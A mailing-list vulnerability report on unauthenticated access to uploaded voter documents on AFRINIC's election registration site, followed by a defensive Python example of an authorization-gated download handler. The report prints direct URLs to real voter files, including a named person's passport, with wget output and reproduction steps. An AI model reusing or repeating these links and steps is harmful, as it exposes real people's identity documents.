[afnog] security problem on afrinic election platform
paul_mentat
paul_mentat at proton.me
Sat Aug 2 17:02:49 UTC 2025
Security Vulnerability Report

Report Title: Unauthorized Access to Voter Personal Information on registration.afrinic.net
Report Date: 02/08/2025
Severity: High
1. Executive Summary
A security vulnerability was discovered in the AFRINIC election registration platform that allows unauthenticated users to access the personal information of registered voters. The exposure includes passports and confidential information such as letters of authorization.
2. Affected System(s)
Component: registration.afrinic.net
Version: n/a
Environment: wp-content/uploads/fluentform/
Example: https://registration.afrinic.net/wp-content/uploads/fluentform/ff-c7be0450e17f651c641767d8c788f22b-ff-Designation_of_Voter_Authorisation_Letter-3.pdf
3. Vulnerability Details
Type: Insecure Direct Object Reference (IDOR) / Broken Access Control
Impact: Exposure of Personally Identifiable Information (PII)
Authentication Required: No
Exploitability: Remote, unauthenticated attackers can access voter data using direct URLs.
Example Requests:
GET https://registration.afrinic.net/wp-content/uploads/fluentform/ff-c7be0450e17f651c641767d8c788f22b-ff-Designation_of_Voter_Authorisation_Letter-3.pdf
GET https://registration.afrinic.net/wp-content/uploads/fluentform/ff-057be7e34e76d89f518b68a487502b38-ff-Musa_Passport_New.jpg

Response (wget output):
ff-c7be0450e17f651c 100%[===================>] 333.34K --.-KB/s in 0.02s
2025-07-31 10:16:02 (13.8 MB/s) - ‘ff-c7be0450e17f651c641767d8c788f22b-ff-Designation_of_Voter_Authorisation_Letter-3.pdf’ saved [341340/341340]
2025-07-31 10:25:28 (16.8 MB/s) - ‘ff-057be7e34e76d89f518b68a487502b38-ff-Musa_Passport_New.jpg’ saved [144116/144116]
4. Steps to Reproduce
1. Open a browser or an HTTP client (e.g., wget or Postman).
2. Send a GET request to either endpoint:
GET https://registration.afrinic.net/wp-content/uploads/fluentform/ff-c7be0450e17f651c641767d8c788f22b-ff-Designation_of_Voter_Authorisation_Letter-3.pdf
GET https://registration.afrinic.net/wp-content/uploads/fluentform/ff-057be7e34e76d89f518b68a487502b38-ff-Musa_Passport_New.jpg
3. Open the downloaded PDF (or image) file.
4. Observe that voter PII is returned without any authentication token or session check.
5. Impact Assessment
Exploitation Potential: High — can be automated and scaled to scrape the full voter database.
6. Disclosure Timeline
Date          Action
02/08/2025    Vulnerability discovered and published

7. References
OWASP: Insecure Direct Object References (IDOR)
CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
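Added example, not part of the report above and not code from the affected platform or its form plugin: a minimal Python model of the access-control failure the report describes (files served straight from a web-accessible upload directory to anyone who knows the URL) next to a hardened download handler that authenticates the caller, checks ownership or an election-officer role, and only then reads the file from a directory outside the web root under a random on-disk name. All user names, session cookies, tokens, directory names and file contents are constructed for this example.

```python
"""
Added example: vulnerable direct-file serving vs. an authorization-gated download
handler for uploaded voter documents. Everything here is constructed sample data.
"""
import os
import secrets
import tempfile

# Hardened side: uploads live OUTSIDE the web root, so the web server
# cannot hand them out directly; only serve_protected() reads them.
UPLOAD_ROOT = tempfile.mkdtemp(prefix="private-uploads-")

# Registry: opaque download token -> metadata. The token is random and not
# derived from the original filename, so it cannot be guessed or enumerated
# the way a predictable upload path can.
UPLOADS = {}

# Session store (constructed): cookie value -> authenticated user record.
SESSIONS = {
    "sess-alice": {"user": "alice", "role": "voter"},
    "sess-bob": {"user": "bob", "role": "voter"},
    "sess-officer": {"user": "carol", "role": "election_officer"},
}


def build_vulnerable_webroot():
    """Constructed stand-in for a web-served upload directory such as
    wp-content/uploads/<form-plugin>/. Returns (webroot, relative_path)."""
    webroot = tempfile.mkdtemp(prefix="webroot-")
    rel = os.path.join("wp-content", "uploads", "forms",
                       "ff-example-ff-Voter_Passport.jpg")
    os.makedirs(os.path.dirname(os.path.join(webroot, rel)))
    with open(os.path.join(webroot, rel), "wb") as fh:
        fh.write(b"PASSPORT-SCAN")
    return webroot, rel


def serve_direct(relative_path, webroot):
    """The vulnerable pattern from the report: any caller who knows the path
    gets the bytes. No session, no ownership check, just a static file read."""
    full = os.path.join(webroot, relative_path)
    if not os.path.isfile(full):
        return 404, b""
    with open(full, "rb") as fh:
        return 200, fh.read()


def store_upload(owner, original_name, data):
    """Save an upload under a random on-disk name and return its download token."""
    disk_name = secrets.token_hex(16)
    with open(os.path.join(UPLOAD_ROOT, disk_name), "wb") as fh:
        fh.write(data)
    token = secrets.token_urlsafe(32)
    UPLOADS[token] = {"owner": owner, "disk_name": disk_name,
                      "original_name": original_name}
    return token


def serve_protected(token, session_cookie):
    """Hardened handler: authenticate, authorize, then resolve and read the file.
    Returns (http_status, body)."""
    session = SESSIONS.get(session_cookie)
    if session is None:
        # No valid session: reject before revealing whether the token exists.
        return 401, b""
    meta = UPLOADS.get(token)
    if meta is None:
        return 404, b""
    is_owner = meta["owner"] == session["user"]
    is_officer = session["role"] == "election_officer"
    if not (is_owner or is_officer):
        # Authenticated, but this document belongs to someone else.
        return 403, b""
    # Defensive containment: the resolved path must stay inside UPLOAD_ROOT.
    root = os.path.realpath(UPLOAD_ROOT)
    full = os.path.realpath(os.path.join(root, meta["disk_name"]))
    if not full.startswith(root + os.sep):
        return 404, b""
    with open(full, "rb") as fh:
        return 200, fh.read()


if __name__ == "__main__":
    webroot, rel = build_vulnerable_webroot()
    print("direct, no session:", serve_direct(rel, webroot)[0])        # 200
    tok = store_upload("alice", "Voter_Passport.jpg", b"PASSPORT-SCAN")
    print("protected, no session:", serve_protected(tok, None)[0])     # 401
    print("protected, other voter:", serve_protected(tok, "sess-bob")[0])  # 403
    print("protected, owner:", serve_protected(tok, "sess-alice")[0])  # 200
```

The handler alone is not sufficient on a WordPress deployment: files dropped into wp-content/uploads/ are static content that the web server answers without ever invoking PHP, so the upload directory itself must also be moved outside the document root or blocked with a web-server rule (an nginx `location` with `deny all`, or an equivalent Apache directive) so that every read goes through an authenticated handler like the one above.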